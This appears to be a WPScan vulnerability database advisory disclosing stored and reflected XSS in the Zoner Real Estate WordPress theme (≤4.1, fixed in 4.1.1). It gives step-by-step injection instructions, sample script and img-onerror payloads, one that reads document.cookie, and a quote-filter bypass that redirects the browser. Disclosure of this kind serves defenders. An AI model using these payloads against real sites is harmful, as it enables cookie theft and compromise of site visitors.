Zoner - Real Estate <= 4.1 - Reflected & Stored XSS



Description
Weak security measures like bad input fields data filtering has been discovered in the «Zoner - Real Estate WordPress Theme».
Proof of Concept
PoC (Stored XSS Injection):
Register on the demo website and go to https://zoner.fruitfulcode.com/author/[your_login]/?profile-page=my_profile page. Inside any text field type "> first just to «close» an input field, then use your payload, save the data and your code will be successfully injected. For any text box instead of "> use </textarea> first and then your payload.
Sample payload #1: "><script>alert('QUIXSS')</script>
Sample payload #2: "><img src="x" onerror="alert('QUIXSS');">
Sample payload #3: "><img src=x onerror=alert('QUIXSS')>

PoC (Reflected XSS Injection):
Go to any page with the «Search Your Property» form, f.e. https://zoner.fruitfulcode.com/home_v/3/ and use your payload inside the «Keyword» input field. Keep in mind that quotes will be filtered, but u can bypass it by using combination of ` quotes and «no quotes» (check the provided samples).
Sample payload #1: "><img src="x" onerror="alert(document.cookie)">
Sample payload #2: "><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>

Affects Theme

fixed in version 4.1.1

References

URL https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher QUIXSS
Submitter quixss
Submitter Website defcon.su
Submitter Twitter @quixss
Views 5822
Verified Yes
WPVDB ID 9424

Timeline

Publicly Published 2019-07-05 (4 months ago)
Added 2019-07-05 (4 months ago)
Last Updated 2019-07-05 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin